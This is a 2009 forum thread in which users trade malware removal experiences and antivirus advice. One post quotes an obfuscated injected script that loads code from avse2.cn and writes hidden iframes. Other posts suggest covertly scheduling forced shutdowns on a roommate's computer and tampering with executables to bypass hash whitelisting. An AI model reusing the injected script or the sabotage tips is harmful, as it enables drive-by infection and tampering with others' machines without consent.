|
Midelne posted:SANS post on something very similar today, at least with regards to .exe hijacking. Looks like another major pain in the rear end to clean no matter how you slice it. I actually got to play around with this bugger (Windows Police Pro) the other day. It's an incredible pain if you're taking the route that the contributor of the article took, but appears to be the only modern malware that does not infect System Restore points. You can go in, delete the program files and a suspicious-looking temp file directory that has randomly-named files and unicows.dll hanging out somewhere on your computer, then start a system restore. The system restore doesn't kill the original infection vector, but it takes care of the damage to file associations that WPP caused and gives you the chance to avoid reimaging the machine or losing data. MalwareBytes finds and eliminates it fine once it can actually run. Infection vector in this case, judging by user's browsing history, was one of three absolutely legitimate sites that I would never expect to be compromised (American military website, ADP.com, or Bing.com are the only sites accessed on that machine, Bing being used to locate the military website). Most likely an invisible frame in the website, pulled content from lovsexx.ru. Do not go to lovsexx.ru.
|
#
?
Sep 9, 2009 17:32
|
|
|
|
| # ? Jun 7, 2024 09:52 |
|
|
thelightguy posted:Not saying I doubt you or anything, but there are so many inconsistencies between BIOSes that it would be impossible to write something that would target more than a relatively small number of systems, since you'd need a different binary image for each motherboard. The Amiga, because of its more standardized architecture had so-called restart proof viruses, which were more or less BIOS level, but not the PC. The ones I remember seeing tended to target various popular gamer motherboards. It's surprising how popular certain boards would be, but the PC BIOS virus/wiper thing seems to have died off these days, probably because by 2002 or so a lot of motherboard producers that sold primarily to people building stuff themselves started putting anti-BIOS virus stuff in their systems. I have a couple of noname boxes from 2002 or so that a gamer friend of mine gave to me that have "BIOS VIRUS GUARD" which basically locks down the flashing ability on every bootso the only way to flash it is to reboot while holding certain keys down.
|
|
#
?
Sep 9, 2009 19:02
|
|
|
I'm really confused. My facebook just sent a message to 1 person: "hey I'm making crazy money online! take a look at MyBizOffer.com to see how you can start too! JoN" I changed the password immediately. Anybody know what this could be? I only use that password for Facebook, fortunately.
|
|
#
?
Sep 10, 2009 12:43
|
|
|
PerfectlyAnonymous posted:I'm really confused. My facebook just sent a message to 1 person: KMFT, Koobface? Stop clicking every video link you see 
|
|
#
?
Sep 10, 2009 13:50
|
|
|
I just got a kind of weird one. I resumed a Firefox session that had a hojillion tabs so I'm not entirely certain which one set this off, but the Firefox window was either a centered picture of a warning popup, or Firefox popups don't get their own item in the taskbar or something because I get this message about how my computer needs to be scanned for viruses. Okay I'll just Alt-f4 because I'm not clicking anything on a window that may or may not be there. So when I Alt-f4 it apparently captured that closed the 'pop-up' but then maximized my Firefox window and made a fake My Computer crossed with some kind of fake virus scanning page. Alt-f4ing this page killed Firefox and when I opened up a fresh session it seems to be acting normal again. Scanned with MBAM, SAS, and Nod32 and apparently nothing happened. I was unaware programs could capture Alt-F4 to do something other than close the window. Is this normally possible or do I have something that's not being picked up making it possible?
|
|
#
?
Sep 13, 2009 07:03
|
|
|
I had a malicious Super/UltraAntiSpyware 2010 ad come up on two tabs on SomethingAwful today. They try pretty hard with the XP explorer background image, it doesn't work as well as imagined when the user is using Windows Vista/7 though. It's been a while since I've encountered any significant viruses on our several hundred machines at work, apparently Symantec Endpoint Protection isn't that bad of a product (that or it's disabling the protection).
|
|
#
?
Sep 13, 2009 08:10
|
|
|
KomradeVirtunov posted:I had a malicious Super/UltraAntiSpyware 2010 ad come up on two tabs on SomethingAwful today. They try pretty hard with the XP explorer background image, it doesn't work as well as imagined when the user is using Windows Vista/7 though. Yeah I got the same thing here this afternoon. I reported it.
|
|
#
?
Sep 13, 2009 08:38
|
|
|
Hipster_Doofus posted:Yeah I got the same thing here this afternoon. I reported it. I can't on my end, I was surfing SA but just minutes ago I installed a printer with some drivers so I wasn't sure if it was a website or the stuff I just installed.
|
|
#
?
Sep 13, 2009 23:36
|
|
|
I have a user's laptop here who complained of no longer being able to access SSL websites and other various issues. She said she was renewing her subscription to McAfee and the next thing she knew, she couldn't sign into AOL anymore, open McAfee or sign into Verizon Central. I pretty much assumed an infection of some kind so I started off by going through Add/Remove Programs, msconfig, etc. I had to run the McAfee removal utility before ComboFix would even run properly. Eventually ComboFix deleted a KB913800.exe file in C:\WINDOWS\system32 and also deleted an entry in C:\RECOVER (even after I had initially turned off System Restore). Anyone heard of this infection? There are various reports online about it but nothing definitive. I'm doing some additional scans on it right now.
|
|
#
?
Sep 14, 2009 03:05
|
|
|
OK guys pretty sure I'll be flamed to death for it but I'm requesting some rather...odd, help. If it's not kosher just let me know and I'll edit the post. Practical jokes between my roommate and I have escalated to the point of sabotage and subterfuge. Yesterday he sent an email from my own computer to my laptop tricking me into driving an hour out of the city for a job interview that I didn't have. The day before he used the house FTP/fileserver (hosted on my comp) to change my alarm setting (also on my comp) so I'd wake up bright and early on Saturday, my one day to sleep in. Clearly it's time to retaliate. I'm looking for a virus or worm or whatever it's called that will shut down the computer abruptly the second the computer hits April Fools (1st). Now he's moving across the country in a few days so it needs to be something I can implant and send him on his way. Either that or a virus that will slowly but surely open the doors for other virii until the computer is either unusable or has accumulated a rather large amount of horse porn. Shock and embarrassment value are key here. The target computer is just his media/music center so there's nothing important on it.
|
|
#
?
Sep 17, 2009 03:31
|
|
|
I think that violates the spirit of this thread. There are features built into Windows that will activate a shutdown at a specific time, but they usually give at least 30 seconds warning.
|
|
#
?
Sep 17, 2009 03:40
|
|
|
Just install Limewire on the computer. The viruses will begin to accumulate from there.
|
|
#
?
Sep 17, 2009 03:47
|
|
|
Otacon posted:Just install Limewire on the computer. The viruses will begin to accumulate from there. Nah, we're not as computer savvy as most of the people in SHSC but even to us that's a redflag.
|
|
#
?
Sep 17, 2009 03:53
|
|
|
thehandtruck posted:Nah, we're not as computer savvy as most of the people in SHSC but even to us that's a redflag. rjlsoftware.com/software/entertainment/ has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds. BLAH: Careful on that link, may have iframe hijackers injected into the site. FCKGW fucked around with this message at 15:54 on Sep 17, 2009 |
|
#
?
Sep 17, 2009 04:32
|
|
|
BorderPatrol posted:This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds. Perfect! Not doing any actual damage was 2nd priority but if I can avoid it great. Thanks. edit: is there any way I can delay the program for a certain amount of time. Like the Y2k one to not start until April first? thehandtruck fucked around with this message at 05:23 on Sep 17, 2009 |
|
#
?
Sep 17, 2009 05:18
|
|
|
BorderPatrol posted:This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds. This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences. <script type="text/javascript" src=http://avse2.cn> var ff=new ActiveXObject(flash);} catch(b){}; finally{if(b!="[object Error]"){document.write("<iframe width=111 height=111 src=f.html></iframe>");}} Jesus christ this thing has like 300 .js iframes in iframes all obfuscated
|
|
#
?
Sep 17, 2009 05:58
|
|
|
Elected by Dogs posted:This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences. Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs. Google search for avse2.cn doesn't turn up too good. Welp, tread lightly then. New website to test your antivirus software I guess 
|
|
#
?
Sep 17, 2009 15:52
|
|
|
thehandtruck posted:Nah, we're not as computer savvy as most of the people in SHSC but even to us that's a redflag. If you think he's unlikely to check his scheduled tasks, use the at and shutdown commands to schedule forced shutdowns at any time and date you desire.
|
|
#
?
Sep 17, 2009 16:07
|
|
|
BorderPatrol posted:Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs. It's at the bottom right below the Google Analytics code before </body>
|
|
#
?
Sep 17, 2009 21:37
|
|
|
once being the controller of a major botnet in my younger days before being arrested, Now i am faced with dealing with my own bullshit. A rootkit that is hard as gently caress to manually remove, Almost have tried everything, scanning it as an external wont work either. May just end up formatting it if its worth more then the hassle of manually fixing it. tdsserv was easy to remove but bluefuzion took a bit more work, took shorter then i expected. Pwnz0r fucked around with this message at 01:44 on Sep 24, 2009 |
|
#
?
Sep 24, 2009 00:17
|
|
|
Pwnz0r posted:once being the controller of a major botnet in my younger days before being arrested, Now i am faced with dealing with my own bullshit. A rootkit that is hard as gently caress to manually remove, Almost have tried everything, scanning it as an external wont work either. May just end up formatting it if its worth more then the hassle of manually fixing it. I don't know how it works for home use, but in an enterprise environment if you are even in doubt about being rooted it is my understanding that you format the sucker and install from known-good. I don't know that I would even bother attempting to remove a rootkit on my home machine unless it somehow interfered with me saying "Brb, formatting and reinstalling Windows" on AIM.
|
|
#
?
Sep 24, 2009 02:29
|
|
|
Ran into a new variant of XP Police that linked the default .exe class extension to a helper .dll that would check to see if the process you are launching is on an internal whitelist. if you were trying to open something that wasn't on the list, it would auto-close the program and report it supposedly "infected", cascade with pop-ups to buy protection, etc. easily fixed by renaming taskmgr.exe to explorer.exe and closing the processes responsible, renaming the .dll, then fixing HKEY_CLASSES_ROOT\exefile\shell\open\command, but gently caress do they keep getting more persistent. This is almost impossible to walk someone through over the phone.
|
|
|
#
?
Sep 24, 2009 04:45
|
|
|
This afternoon my brother used my computer to print out something for his school. As soon as he plugged in his USB stick it was like giving my computer the clap via autorun. I thought I had autorun turned off, but it was set to only disable CD-ROM autoplay  I immediately started getting those "YOUR COMPUTER IS INFECTED!!!" popups. Checked with GMER and yep, I ended up with some horrible rootkit (UAC.Fake) that SuperAntiSpyware and MalwareBytes could see but not remove. It also injected itself into every running executable at the time. Thankfully it didn't modify any of them, it just masqueraded as a device driver and injected itself into every running program so you couldn't take it down. It also didn't help that the rootkit would crash them and delete the executable halfway through the scan. I was afraid to use a USB stick on this computer so I ended up setting up a Samba share between my Gentoo computer and the PC. I figured out that if you kill explorer.exe, firefox.exe, and iexplore.exe on bootup the virus goes dead. Downloaded ComboFix on the Gentoo computer, (the rootkit ate the one I had, of course), copied it to the PC and ran it. An hour later, my computer worked again. What would I do without you ComboFix 
|
|
#
?
Sep 24, 2009 05:56
|
|
|
Elected by Dogs posted:It's at the bottom right below the Google Analytics code before </body> Sometimes rooted HTTP servers only show the iframe on random occasions. This happened to me when my website was on GOONY GOON host WoolNet and their admins refused to believe the server was compromised because they "didn't see it".
|
|
#
?
Sep 24, 2009 07:45
|
|
|
Luigi Thirty posted:What would I do without you ComboFix Yeah Combofix in safe mode is now pretty much the first thing I run on a infected machine. If it does not clear it out so I can run a antivirus scan I just format because in the end its faster.
|
|
#
?
Sep 24, 2009 23:39
|
|
|
Combofix has saved my rear end so many times at the office that I finally donated some money by paypal to combofix@live.com. I figure with the money I've made using it, I might as well. Karma++, right?
|
|
#
?
Sep 25, 2009 00:29
|
|
|
It never ends. My mom was browsing Facebook in IE and clicked on one of those "YOU HAVE TO SEE THIS!!!! https://www.virus.com" links. She said she didn't open anything, but IE says that an SSL certificate is invalid when she tries to click on the Facebook settings page making me think it was a drive-by SSL certificate exploit or something. IE, of course, won't tell me which certificate is the invalid one. GMER came up clean. Her solution was to go in in Firefox and change her password because Firefox didn't prompt her saying the certificate was invalid. I'm afraid of a man-in-the-middle attack that hijacks her account, but I don't know much about IE SSL exploits. How do I figure out which SSL certificate is invalid? Delete them all?
|
|
#
?
Sep 29, 2009 23:20
|
|
|
MS security essentials is out for everyone apparently. I was thinking of switching to it from Avast!, but does anyone whose used it know if its comparable or uses less resources? I'm wary to change, largely cause Avast does some 'meta' things that I haven't seen from a lot of other AV/malware I've used like triggering a secure desktop anytime you/something else tries to uninstall it.
|
|
#
?
Sep 30, 2009 01:06
|
|
|
hobb posted:MS security essentials is out for everyone apparently. I was thinking of switching to it from Avast!, but does anyone whose used it know if its comparable or uses less resources? I'm wary to change, largely cause Avast does some 'meta' things that I haven't seen from a lot of other AV/malware I've used like triggering a secure desktop anytime you/something else tries to uninstall it. I've had it since beta, and have installed it on many friends and families computers. No complaints. It is better suited for a home market, however - Avast (I feel) is more geared towards a power-user; many of my older family members find it confusing, despite the tape-deck controls. MSE is wonderful for anyone - especially if their existing anti-virus choice has a habit of staying unsubscribed for months or years at a time - OR, if you're running one of those near-worthless free versions of McAfee you get with high-speed companies.
|
|
#
?
Sep 30, 2009 06:40
|
|
|
MSE is a pretty nice AV and I think is a nice replacement for Avast, AVG and Antivir. I feel that Antivir offers the best protection, but when there is a version update, the way to disable avnotify.exe often stops working on xp home machines. So the computers I installed it on for friends will have that drat pop-up come back up! Screw it, I just put MSE on those machines. I like how its nice and quiet, it never bugs the user unless something is wrong. Some people have bitched about how one of the processes can use 50mb of ram, but jesus christ spend 15 bucks and get 512+ more ram then! Is anybody else tired of people bitching about modern apps that use more than 8mb of ram?
|
|
#
?
Sep 30, 2009 13:20
|
|
|
Capnbigboobies posted:Is anybody else tired of people bitching about modern apps that use more than 8mb of ram? Yes. 
|
|
#
?
Sep 30, 2009 13:29
|
|
|
My aunt's laptop which she lets her kids use got infected with Vundo recently. It was particularly annoying, since the PC would freeze before a scan of any kind could complete, including running vundofix in safe mode. Ended up just formatting the fucker. drat kids.
|
|
#
?
Sep 30, 2009 14:09
|
|
|
frabba posted:drat kids. Install Vista / 7, turn UAC up, and make sure the kids have Standard User accounts that have absolutely no administrative privileges. Then teach your aunt how to pick a good password and instruct her that she should absolutely never give her children the password or allow them to watch her type it in. If necessary, configure Parental Controls. No more viruses, or at least very very few of them that do more than sit in that single user's profile and cause popups.
|
|
#
?
Sep 30, 2009 16:34
|
|
|
Virut strikes again!Engadget posted:This isn't the first time we've heard of an institutional virus outbreak -- even the crew of the International Space Station had a neat little scare not too long ago -- and now various outlets in Australia are reporting that Integral Energy, which supplies energy to homes and businesses in New South Wales and Queensland, has suffered a particularly nasty visit by the W32.Virut.CF virus. When all was said and done, the company had to repair all 1000 of the facility's desktops. Furthermore, the Sydney Morning Herald reports that the company's anti-virus software hadn't been updated since at least February. Between the lack of anti-virus updates and the fact that segregation between the company's main network and the grid was "typically none at all" this story has all the makings of a disaster. Luckily, the grid itself runs on Sun Solaris -- and when control systems became infected, how did they fix the mess? That's right: by replacing them with Linux machines At least they had the sensibility to just replace the infected machines.
|
|
#
?
Oct 10, 2009 04:35
|
|
|
Is Virut still pretty dangerous, or have most AV scanners gotten better at detecting it?
Slow-Scan Shep fucked around with this message at 07:23 on Oct 10, 2009 |
|
#
?
Oct 10, 2009 07:21
|
|
|
Here's how good trojans/viruses work: Update your code and install base faster than antivirus companies can. So yes, it's dangerous AND they're better at detecting it AND it's getting better at not getting detected.
|
|
#
?
Oct 10, 2009 07:52
|
|
|
BorderPatrol posted:Virut strikes again! An IT administrator was probably nagging them to buy this and buy that. After this happened, the admin probably told them the only way to prevent this from happening again is to switch to Linux. Not that it's a bad thing I just think it's funny.
|
|
#
?
Oct 11, 2009 17:49
|
|
|
Microsoft Malware Blog does Windows Police Pro Not much in-depth analysis there, though it does give good visuals, but has a link to the much more detailed Windows Police Pro / W32/FakeScanti entry in their malware encyclopedia. Good read. edit: Bonus image for the chutzpah of whoever coded this. 
|
|
#
?
Oct 14, 2009 15:41
|
|
The Pro posted:You should also only allow authorized programs with hash checking. Software Restriction Policies and Hash rules via Group Policy are very easily defeated. Open executable in hex editor, go to the end of the file, smash keyboard, save executable. Now I can play Solitaire in peace, you fuckers. Whitelisting all known, good, desired software and denying anything else is the way to go in a business environment, but good luck with that. I can barely get IT admins to stop sharing out the entire C:\ drive on 1,000 workstations with Read/Write permissions or turning off any useful security feature the minute it becomes more than 5 seconds of additional work, or causes a slight performance increase. MY MEGAHURTZZZ. The security problem right now isn't with anti-virus: it's with the people managing it. Every single virus outbreak scenario I walk into, there is something absolutely boneheaded configured somewhere, 100%, guaranteed. What's up, exclude remote files turned on. Why? Better performance! My users complained! Well, are the users complaining now that their machines are blissfully running autorun.inf from their network drives and infecting them with Virut or Conficker, spreading to any USB key they plug in, so they can take it home with them too? loving idiots. Eight step guide to nearly perfect security in Windows: 1) Install the KB patch and disable Autoruns via Group Policy. 2) AV and Anti-spam scanning at the gateway. 3) AV and Anti-spam scanning at the Exchange store / SMTP server. 4) Disable the ability to send any archive or executable attachments via e-mail. 5) Whitelist known applications, block all others (HIPS or similar systems). 6) Least privileged access for all service accounts and network shares, if possible. Ask vendors for documentation on this. 7) Use a regular user account for day to day activity, RunAs your administrator account only on a CLEAN and TRUSTED machine, and only to perform quick tasks. 8) USB keys / iPods / iPhones are banned from being plugged into company equipment. Kill anyone who violates this, get software to enforce it if needed. URL grey tea fucked around with this message at 12:51 on Oct 17, 2009 |
|
|
#
?
Oct 17, 2009 12:01
|
|
|
|
| # ? Jun 7, 2024 09:52 |
|
|
Also, I had an interesting case at work today where a new variant of Scribble (you guys call it Virut here) had infected a bunch of other malware on 9 or so computers in this guy's network. The call was started by the fact the AV software was failing to clean these up, for seemingly no reason, and was throwing suspicious packer detections as well. After the customer sent us some of the files for testing, we found it was a new variant of Virut. Barf. Cleanup was (amusingly) failing on the other malware because they had been infected by the new virut routine, changing the file contents / positions, which broke cleanup. To remove those, we had to disinfect everything via a bootable CD scan, which removed the virut infections, and then had to re-run the scan again to remove the original malware that Virut had hosed with. Double virus.
URL grey tea fucked around with this message at 12:55 on Oct 17, 2009 |
|
|
#
?
Oct 17, 2009 12:53
|
|